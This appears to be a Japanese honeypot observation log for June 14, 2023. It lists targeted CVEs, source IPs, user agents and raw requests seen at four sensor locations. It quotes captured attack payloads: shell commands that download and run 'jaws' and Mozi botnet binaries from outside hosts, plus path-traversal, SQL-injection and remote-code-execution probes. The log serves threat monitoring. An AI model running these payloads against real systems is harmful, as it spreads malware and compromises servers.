2023/06/14 ハニーポット(仮) 観測記録 - コンニチハレバレトシタアオゾラ

ハニーポット(仮) 観測記録 2023/06/14分です。

特徴

共通

Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス
GPONルータの脆弱性を狙うアクセス
Telerik UIの脆弱性(CVE-2019-18935)を狙うアクセス
CensysInspectによるスキャン行為
zgrabによるスキャン行為
.jsへのスキャン行為
/.envへのスキャン行為
/.gitへのスキャン行為

Location:JP

UserAgentがHello, worldであるアクセス

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget 95.214.27.201/jaws;
sh /tmp/jaws

Location:US

F5 BIG-IP製品の脆弱性(CVE-2022-1388)を狙うアクセス
FortiOSの脆弱性(CVE-2018-13379)を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
Apache Solrへのスキャン行為
Laravelへのスキャン行為
UserAgentがHello, worldであるアクセス

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget 103.16.161.29/jaws;
sh /tmp/jaws

cd /tmp;
rm -rf *;
wget 95.214.27.201/jaws;
sh /tmp/jaws

Location:UK

Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
Apache Solrへのスキャン行為
Laravelへのスキャン行為
UserAgentがHello, worldであるアクセス

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget 167.71.210.63/jaws;
sh /tmp/jaws

Location:SG

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget 103.16.161.29/jaws;
sh /tmp/jaws

cd /tmp;
rm -rf *;
wget http://190.109.228.141:47854/Mozi.a;
chmod 777 Mozi.a;
/tmp/Mozi.a jaws

他

アクセス数推移

JP：総アクセス数：113 (前日比：3)
US：総アクセス数：200 (前日比：101)
UK：総アクセス数：95 (前日比：7)
SG：総アクセス数：120 (前日比：-118)

都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。

Location:JP

送信元IPアドレス一覧

件数	送信元IPアドレス	国
11	3.215.133.80	United States
1	3.236.148.162	United States
2	24.199.98.33	United States
2	34.204.192.185	United States
1	35.92.191.132	United States
17	43.154.141.71	Singapore
1	45.56.108.128	United States
1	45.79.181.251	United States
1	45.156.128.2	Hungary
1	45.183.160.84	Brazil
1	49.213.185.91	Taiwan
1	64.62.197.100	United States
1	64.62.197.105	United States
3	79.133.51.240	Germany
1	87.120.88.17	Bulgaria
1	104.192.0.50	United States
1	104.248.170.187	United States
1	107.170.224.10	United States
1	107.170.235.18	United States
2	109.237.97.180	Russia
1	128.1.248.26	United States
1	128.127.105.134	Netherlands
16	135.125.246.189	France
2	138.197.15.3	United States
2	146.190.48.172	United States
4	152.32.171.91	Hong Kong
1	162.142.125.12	United States
10	167.71.37.220	United States
1	167.94.138.52	United States
1	167.248.133.37	United States
1	172.104.11.51	United States
1	172.104.242.173	United States
1	173.212.243.253	Germany
1	175.107.0.151	Pakistan
1	185.157.78.242	Ukraine
3	185.254.196.173	Ukraine
1	185.254.196.186	Ukraine
1	188.165.63.130	France
1	193.29.104.212	Romania
1	193.35.18.52	Bulgaria
1	193.35.18.200	Bulgaria
1	198.235.24.2	United States
1	203.115.85.224	India
1	205.210.31.228	United States
1	206.189.116.185	United States
1	212.224.107.220	Germany
5	220.94.228.163	South Korea

UserAgent一覧

件数	UserAgent
27	`-`
2	`Go-http-client/1.1`
2	`Hello, world`
1	`Mozilla/5.0 (Linux; Android 11; LM-V500N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36`
1	`Mozilla/5.0 (Linux; Android 12; SM-F926B) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Mobile Safari/537.36`
1	`Mozilla/5.0 (Linux; U; Android 0.5; en-us) AppleWebKit/522 (KHTML, like Gecko) Safari/419.3`
2	`Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.75 Safari/537.36`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36`
3	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36`
17	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36`
6	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36`
6	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36`
2	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36`
21	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
1	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/110.0`
2	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0`
3	`Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)`
1	`Mozilla/5.0 (compatible; YandexNews/4.0; +http[:]//yandex[.]com/bots)`
7	`Mozilla/5.0 zgrab/0.x`
1	`Mozilla/5.0`
1	`Python-urllib/3.6`
1	`SonyEricssonT650i/R7AA Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1`
1	`python-requests/2.31.0`

リクエスト内容一覧

件数	Method	Request	Protocol
3		`-`
1		`MGLNDD_18.179.20.5_80\n`
1		`\x16\x03\x01\x01H\x01`
1		`\x16\x03\x01\x01\t\x01`
2		`\x16\x03\x01\x01\xfa\x01`
13		`\x16\x03\x01`
2		``
23	GET	`/.env`	HTTP/1.1
1	GET	`/.git/HEAD`	HTTP/1.1
2	GET	`/.git/config`	HTTP/1.1
1	GET	`/.svn/wc.db`	HTTP/1.1
1	GET	`/1.php`	HTTP/1.1
1	GET	`/99vt`	HTTP/1.1
1	GET	`/99vu`	HTTP/1.1
1	GET	`/Telerik.Web.UI.WebResource.axd?type=rau`	HTTP/1.1
3	GET	`/aaa9`	HTTP/1.1
1	GET	`/aaaaaaaaaaaaaaaaaaaaaaaaaqr`	HTTP/1.1
3	GET	`/aab8`	HTTP/1.1
1	GET	`/boaform/admin/formLogin?username=admin&psd=admin`	HTTP/1.0
1	GET	`/boaform/admin/formLogin?username=user&psd=user`	HTTP/1.0
1	GET	`/bundle.js`	HTTP/1.1
1	GET	`/client/get_targets`	HTTP/1.1
1	GET	`/data/.svn/wc.db`	HTTP/1.1
1	GET	`/druid/index.html`	HTTP/1.1
7	GET	`/favicon.ico`	HTTP/1.1
1	GET	`/files/`	HTTP/1.1
1	GET	`/gate.php`	HTTP/1.1
1	GET	`/geoip/`	HTTP/1.1
1	GET	`/geoserver/web/`	HTTP/1.1
1	GET	`/info.php`	HTTP/1.1
3	GET	`/robots.txt`	HTTP/1.1
2	GET	`/sendgrid.env`	HTTP/1.1
2	GET	`/shell?cd+/tmp;rm+-rf+*;wget+95[.]214[.]27[.]201/jaws;sh+/tmp/jaws`	HTTP/1.1
1	GET	`/sitemap.xml`	HTTP/1.1
1	GET	`/smtp.php`	HTTP/1.1
1	GET	`/systembc/password.php`	HTTP/1.0
1	GET	`/upl.php`	HTTP/1.1
1	GET	`/v3/time`	HTTP/1.1
1	GET	`/web/.svn/wc.db`	HTTP/1.1
17	HEAD	`/Core/Skin/Login.aspx`	HTTP/1.1
2	POST	`/boaform/admin/formLogin`	HTTP/1.1
1	POST	`/cgi-bin/.%%%%32%%65/.%%%%32%%65/.%%%%32%%65/.%%%%32%%65/.%%%%32%%65/bin/sh`	HTTP/1.1
1	fox	`a 1 -1 fox hello\n`

Location:US

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	31.7.63.42	Panama
2	34.204.192.185	United States
1	45.33.80.243	United States
1	45.79.128.205	United States
1	45.79.172.21	United States
1	45.79.181.104	United States
2	45.79.181.251	United States
1	45.156.129.12	Hungary
1	51.158.37.186	France
28	54.36.115.221	France
7	54.37.79.75	France
1	64.227.43.118	United States
2	68.183.193.242	United States
4	71.6.135.131	United States
1	77.245.219.203	Russia
2	80.94.95.248	Romania
12	83.97.73.89	Germany
1	84.54.51.109	Bulgaria
1	87.120.88.17	Bulgaria
1	94.23.133.43	France
1	103.170.254.16	Vietnam
1	103.179.189.234	Vietnam
2	109.237.97.180	Russia
2	109.237.98.226	Russia
1	128.1.248.26	United States
1	129.114.108.70	United States
10	147.182.145.248	United States
2	152.89.198.113	Russia
2	162.142.125.225	United States
2	162.142.125.226	United States
1	167.99.82.178	United States
1	172.104.11.34	United States
1	172.105.128.11	United States
4	172.105.128.13	United States
2	179.43.177.244	Panama
1	185.11.61.117	Russia
4	185.142.236.36	Seychelles
1	187.232.93.12	Mexico
1	192.155.90.220	United States
1	192.241.229.18	United States
1	192.241.236.40	United States
2	193.32.162.190	Romania
2	193.35.18.63	Bulgaria
1	198.199.114.126	United States
1	201.77.117.62	Brazil
1	205.185.116.25	United States
1	205.210.31.46	United States
1	205.210.31.155	United States
2	216.218.206.66	United States
1	220.94.228.163	South Korea
75	222.240.51.96	China

UserAgent一覧

件数	UserAgent
38	`-`
1	`ELinks/0.9.3 (textmode; Linux 2.6.9-kanotix-8 i686; 127x41)`
3	`Hello, world`
1	`Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)`
1	`Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20060702 SeaMonkey/1.5a`
2	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5056.0 Safari/537.36`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36`
75	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36`
6	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36`
2	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36`
12	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36`
37	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
1	`Mozilla/5.0 (X11; Linux x86_64; rv:104.0) Gecko/20100101 Firefox/104.0`
1	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/110.0`
7	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0`
2	`Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)`
6	`Mozilla/5.0 zgrab/0.x`
1	`Mozilla/5.0`
1	`python-requests/2.27.1`

リクエスト内容一覧

件数	Method	Request	Protocol
1		`MGLNDD_34.68.118.83_80\n`
3		`\x03`
2		`\x16\x03\x01\x01H\x01`
2		`\x16\x03\x01\x01\xfb\x01`
18		`\x16\x03\x01`
1		`\x16\x03\x03\x01\x8e\x01`
2		`\x16\x03\x03`
1		``
1	GET	`/%2e/WEB-INF/web.xml`	HTTP/1.1
1	GET	`/../../mnt/mtd/Config/Account1`	HTTP/1.1
1	GET	`/../../mnt/mtd/Config/Account2`	HTTP/1.1
37	GET	`/.env`	HTTP/1.1
1	GET	`/.git/config`	HTTP/1.1
2	GET	`/.well-known/security.txt`	HTTP/1.1
1	GET	`/1.php`	HTTP/1.1
1	GET	`/15294746.php`	HTTP/1.1
1	GET	`/?XDEBUG_SESSION_START=phpstorm`	HTTP/1.1
1	GET	`/?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php>`	HTTP/1.1
1	GET	`/CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/password.properties%00en`	HTTP/1.1
1	GET	`/ReportServer`	HTTP/1.1
1	GET	`/Telerik.Web.UI.WebResource.axd?type=rau`	HTTP/1.1
1	GET	`/WebReport/ReportServer?op=chart&cmd=get_geo_json&resourcepath=privilege.xml`	HTTP/1.1
1	GET	`/_ignition/execute-solution`	HTTP/1.1
1	GET	`/aaa9`	HTTP/1.1
1	GET	`/aab8`	HTTP/1.1
1	GET	`/actuator/gateway/routes`	HTTP/1.1
1	GET	`/admin/?n=product&c=product_admin&a=dopara&app_type=shop&id=1%20union%20SELECT%201,2,3,41639*41036,5,6,7%20limit%205,1%20%23`	HTTP/1.1
1	GET	`/api/proxy/tcp`	HTTP/1.1
1	GET	`/api/v1/users/connection-token/`	HTTP/1.1
1	GET	`/api/whoami`	HTTP/1.1
1	GET	`/appmonitor/protected/selector/server_file/files?folder=/&suffix=`	HTTP/1.1
1	GET	`/bundle.js`	HTTP/1.1
1	GET	`/cdn-cgi/trace`	HTTP/1.1
1	GET	`/client/get_targets`	HTTP/1.1
1	GET	`/common/download/resource?resource=/profile/../../../../etc/passwd`	HTTP/1.1
1	GET	`/console/`	HTTP/1.1
1	GET	`/data/.svn/wc.db`	HTTP/1.1
1	GET	`/data/pbootcms.db`	HTTP/1.1
1	GET	`/defaultroot/site/templatemanager/downloadhttp.jsp?fileName=../public/edit/jsp/config.jsp`	HTTP/1.1
1	GET	`/download.php?file=../../../../../etc/passwd`	HTTP/1.1
2	GET	`/druid/index.html`	HTTP/1.1
1	GET	`/duomiphp/ajax.php?action=addfav&id=1&uid=1%20and%20extractvalue(1,concat_ws(1,1,md5(2000000005)))`	HTTP/1.1
1	GET	`/f/job.php?job=getzone&typeid=zone&fup=..\\..\\do\\js&id=514125&webdb[web_open]=1&webdb[cache_time_js]=-1&pre=qb_label%20where%20lid=-1%20UNION%20SELECT%201,2,3,4,5,6,0,md5(202799194),9,10,11,12,13,14,15,16,17,18,19%23`	HTTP/1.1
9	GET	`/favicon.ico`	HTTP/1.1
1	GET	`/files/`	HTTP/1.1
1	GET	`/forum.php`	HTTP/1.1
1	GET	`/geoip/`	HTTP/1.1
1	GET	`/geoserver/web/`	HTTP/1.1
1	GET	`/geoserver`	HTTP/1.1
1	GET	`/getFavicon?host=baidu.com/?`	HTTP/1.1
1	GET	`/go/add-on/business-continuity/api/plugin?folderName=&pluginName=../../../../../../../../etc/passwd`	HTTP/1.1
1	GET	`/him/api/rest/V1.0/system/log/list?filePath=../`	HTTP/1.1
1	GET	`/hosts`	HTTP/1.1
1	GET	`/htmltopdf/downfile.php?filename=/windows/win.ini`	HTTP/1.1
1	GET	`/iclock/ccccc/windows/win.ini`	HTTP/1.1
1	GET	`/icons/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/etc/passwd`	HTTP/1.1
1	GET	`/index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21`	HTTP/1.1
1	GET	`/info`	HTTP/1.1
1	GET	`/jmx-console/`	HTTP/1.1
1	GET	`/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd`	HTTP/1.1
1	GET	`/kylin/api/admin/config`	HTTP/1.1
1	GET	`/member/ajax_membergroup.php?action=post&membergroup=@`'`/!50000Union+/+/!50000select+/+md5(902215800)+--+@`'``	HTTP/1.1
1	GET	`/nagiosql/admin/commandline.php?cname=%27%20union%20select%20concat(md5(2030372223))%23`	HTTP/1.1
1	GET	`/nifi-api/flow/current-user`	HTTP/1.1
1	GET	`/plug/oem/AspCms_OEMFun.asp`	HTTP/1.1
1	GET	`/plus/download.php?open=1&link=aHR0cHM6Ly93d3cuZHUxeDNyMTIuY29t`	HTTP/1.1
1	GET	`/plus/guestbook.php`	HTTP/1.1
1	GET	`/pma/`	HTTP/1.1
1	GET	`/register/toDownload.do?fileName=../../../../../../../../../../../../../../etc/passwd`	HTTP/1.1
1	GET	`/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession`	HTTP/1.1
2	GET	`/robots.txt`	HTTP/1.1
1	GET	`/s/lvtlcp/_/;/WEB-INF/web.xml`	HTTP/1.1
1	GET	`/s/opentsdb_header.jpg`	HTTP/1.1
1	GET	`/secure/QueryComponent!Default.jspa`	HTTP/1.1
1	GET	`/secure/ViewUserHover.jspa?username=adbehtkp`	HTTP/1.1
1	GET	`/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name=%27test%27,%20root=%27http[:]//aaa%27)%0a@Grab(group=%27package%27,%20module=%27jmiz%27,%20version=%271%27)%0aimport%20Payload;`	HTTP/1.1
1	GET	`/serverLog/showFile.php?fileName=../web/html/main.php`	HTTP/1.1
1	GET	`/shell?cd+/tmp;rm+-rf+*;wget+103[.]16[.]161[.]29/jaws;sh+/tmp/jaws`	HTTP/1.1
2	GET	`/shell?cd+/tmp;rm+-rf+*;wget+95[.]214[.]27[.]201/jaws;sh+/tmp/jaws`	HTTP/1.1
2	GET	`/sitemap.xml`	HTTP/1.1
1	GET	`/solr/admin/info/system?wt=json`	HTTP/1.1
1	GET	`/spaces/viewdefaultdecorator.action?decoratorName`	HTTP/1.1
1	GET	`/system/deviceInfo?auth=YWRtaW46MTEK`	HTTP/1.1
1	GET	`/systemController/showOrDownByurl.do?down=&dbPath=../../../../../Windows/win.ini`	HTTP/1.1
1	GET	`/theme/META-INF/%c0%ae%c0%ae/META-INF/MANIFEST.MF`	HTTP/1.1
1	GET	`/upl.php`	HTTP/1.1
1	GET	`/user.php?act=login`	HTTP/1.1
1	GET	`/user/City_ajax.aspx`	HTTP/1.1
1	GET	`/utils/.git/config`	HTTP/1.1
1	GET	`/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/viewthread.php?tid=10`	HTTP/1.1
1	GET	`/vpn/../vpns/cfg/smb.conf`	HTTP/1.1
1	GET	`/web/.svn/wc.db`	HTTP/1.1
1	POST	`/(download)/tmp/dptwotzc.txt`	HTTP/1.1
1	POST	`/Autodiscover/Autodiscover.xml`	HTTP/1.1
1	POST	`/WEB_VMS/LEVEL15/`	HTTP/1.1
1	POST	`/api/graphql`	HTTP/1.1
7	POST	`/boaform/admin/formLogin`	HTTP/1.1
1	POST	`/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh`	HTTP/1.1
1	POST	`/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh`	HTTP/1.1
1	POST	`/delete_cart_goods.php`	HTTP/1.1
1	POST	`/directdata/direct/router`	HTTP/1.1
2	POST	`/druid/indexer/v1/sampler?for=connect`	HTTP/1.1
1	POST	`/extdirect`	HTTP/1.1
1	POST	`/extend/Qcloud/Sms/Sms.php`	HTTP/1.1
1	POST	`/fileDownload?action=downloadBackupFile`	HTTP/1.1
1	POST	`/inter/ajax.php?cmd=get_user_login_cmd`	HTTP/1.1
2	POST	`/login/userverify.cgi`	HTTP/1.1
1	POST	`/mgmt/tm/util/bash`	HTTP/1.1
1	POST	`/minio/webrpc`	HTTP/1.1
1	POST	`/node/?_format=hal_json`	HTTP/1.1
1	POST	`/pages/createpage-entervariables.action?SpaceKey=x`	HTTP/1.1
1	POST	`/photo/p/api/album.php`	HTTP/1.1
1	POST	`/rest/tinymce/1/macro/preview`	HTTP/1.1
1	POST	`/services%20/WorkflowServiceXml`	HTTP/1.1
1	POST	`/user.php`	HTTP/1.1
1	POST	`/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
2	PRI	`*`	HTTP/2.0
1	PUT	`/SDK/webLanguage`	HTTP/1.1
1	PUT	`/_snapshot/bywd`	HTTP/1.1

Location:UK

送信元IPアドレス一覧

件数	送信元IPアドレス	国
2	34.204.192.185	United States
1	42.233.149.126	China
1	45.33.80.243	United States
3	45.74.10.2	United States
1	45.79.172.21	United States
1	45.79.181.94	United States
1	45.79.181.179	United States
1	45.79.181.251	United States
1	45.156.129.7	Hungary
1	46.101.8.248	United States
14	51.79.29.48	Canada
14	54.37.79.75	France
1	61.218.134.220	Taiwan
1	62.8.65.212	Kenya
1	64.62.197.137	United States
1	64.62.197.143	United States
1	66.175.213.4	United States
1	66.240.192.82	United States
4	68.183.203.70	United States
1	79.79.57.171	United Kingdom
1	80.66.88.211	Russia
8	83.97.73.89	Germany
1	85.208.139.156	Bulgaria
1	94.23.133.43	France
1	107.170.254.15	United States
2	109.237.97.180	Russia
2	109.237.98.226	Russia
1	128.14.134.170	United States
1	138.68.80.252	United States
1	138.68.81.206	United States
1	139.59.209.155	Singapore
2	157.230.99.133	United States
1	161.35.41.172	United States
2	167.94.146.57	United States
1	170.245.31.67	Brazil
1	172.104.11.34	United States
1	172.104.11.46	United States
1	172.104.11.51	United States
1	179.43.177.244	Panama
1	185.11.61.117	Russia
3	192.155.90.220	United States
1	192.241.225.17	United States
1	192.241.236.64	United States
2	193.32.162.190	Romania
1	193.35.18.52	Bulgaria
1	193.35.18.200	Bulgaria
1	205.210.31.5	United States
1	205.210.31.89	United States
1	220.94.228.162	South Korea

UserAgent一覧

件数	UserAgent
32	`-`
5	`FooBarTest`
1	`Hello, world`
1	`Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)`
1	`Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.1 Safari/605.1.15`
4	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36`
2	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36`
8	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36`
1	`Mozilla/5.0 (X11; Linux 3.8-6.dmz.1-liquorix-686) KHTML/4.8.4 (like Gecko) Konqueror/4.8`
30	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
2	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0`
1	`Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)`
4	`Mozilla/5.0 zgrab/0.x`

リクエスト内容一覧

件数	Method	Request	Protocol
2		`-`
1		`27;wget%20http[:]//%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$`	HTTP/1.0
1		`MGLNDD_132.145.66.34_80\n`
2		`\x03`
2		`\x16\x03\x01\x01H\x01`
2		`\x16\x03\x01\x01\xfc\x01`
17		`\x16\x03\x01`
1		`\x16\x03\x03\x01\x8e\x01`
1		``
1	CONNECT	`ssl-judge2[.]api[.]proxyscrape[.]com:443`	HTTP/1.1
1	GET	`/../../mnt/mtd/Config/Account1`	HTTP/1.1
1	GET	`/../../mnt/mtd/Config/Account2`	HTTP/1.1
31	GET	`/.env`	HTTP/1.1
1	GET	`/.git/config`	HTTP/1.1
1	GET	`/1.php`	HTTP/1.1
1	GET	`/?XDEBUG_SESSION_START=phpstorm`	HTTP/1.1
1	GET	`/?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php>`	HTTP/1.1
1	GET	`/ReportServer`	HTTP/1.1
1	GET	`/Telerik.Web.UI.WebResource.axd?type=rau`	HTTP/1.1
1	GET	`/_ignition/execute-solution`	HTTP/1.1
1	GET	`/bundle.js`	HTTP/1.1
1	GET	`/console/`	HTTP/1.1
1	GET	`/data/.svn/wc.db`	HTTP/1.1
1	GET	`/druid/index.html`	HTTP/1.1
4	GET	`/favicon.ico`	HTTP/1.1
1	GET	`/files/`	HTTP/1.1
1	GET	`/geoserver/web/`	HTTP/1.1
1	GET	`/index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21`	HTTP/1.1
1	GET	`/shell?cd+/tmp;rm+-rf+*;wget+167[.]71[.]210[.]63/jaws;sh+/tmp/jaws`	HTTP/1.1
1	GET	`/solr/admin/info/system?wt=json`	HTTP/1.1
1	GET	`/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/web/.svn/wc.db`	HTTP/1.1
5	GET	`http[:]//test[.]getproxylist[.]com/`	HTTP/1.1
2	POST	`/boaform/admin/formLogin`	HTTP/1.1
1	POST	`/cgi-bin/.%%%%32%%65/.%%%%32%%65/.%%%%32%%65/.%%%%32%%65/.%%%%32%%65/bin/sh`	HTTP/1.1
1	POST	`/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh`	HTTP/1.1
1	PRI	`*`	HTTP/2.0

Location:SG

送信元IPアドレス一覧

件数	送信元IPアドレス	国
11	3.214.215.20	United States
1	3.236.88.220	United States
1	20.3.233.241	United States
1	20.55.53.144	United States
3	34.204.192.185	United States
1	42.119.149.163	Vietnam
2	45.33.80.243	United States
1	45.56.108.128	United States
1	45.79.128.205	United States
1	45.79.181.94	United States
1	45.79.181.251	United States
1	45.135.232.28	Russia
19	54.36.115.221	France
9	54.37.79.75	France
10	68.183.203.70	United States
1	80.94.92.24	Romania
10	83.97.73.89	Germany
1	87.120.88.17	Bulgaria
2	87.251.64.11	Russia
1	94.23.133.43	France
2	102.67.226.52	Ivory Coast
1	103.206.130.254	India
2	109.237.97.180	Russia
1	120.231.225.191	China
1	134.209.21.73	United States
1	143.244.175.97	United States
2	162.142.125.216	United States
2	162.142.125.217	United States
1	172.104.11.4	United States
1	172.104.11.51	United States
1	172.105.128.11	United States
2	172.105.128.12	United States
1	178.62.81.94	United States
2	179.43.177.244	Panama
2	184.105.139.68	United States
1	185.11.61.117	Russia
4	185.142.236.43	Seychelles
1	185.180.143.141	Portugal
1	190.109.228.141	Bolivia
1	192.155.90.118	United States
1	192.155.90.220	United States
2	193.32.162.190	Romania
1	193.35.18.52	Bulgaria
1	193.42.32.124	Bulgaria
1	193.118.53.194	United States
1	198.199.112.107	United States
1	198.199.116.154	United States
1	198.235.24.109	United States
1	198.235.24.137	United States
1	212.227.3.204	Germany
1	220.94.228.163	South Korea

UserAgent一覧

件数	UserAgent
38	`-`
1	`Hello, World`
2	`Hello, world`
1	`Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)`
1	`Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)`
2	`Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30`
1	`Mozilla/5.0 (Linux; U; Android 8.0.0; zh-cn; Mi Note 2 Build/OPR1.170623.032) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/61.0.3163.128 Mobile Safari/537.36 XiaoMi/MiuiBrowser/10.1.1`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0`
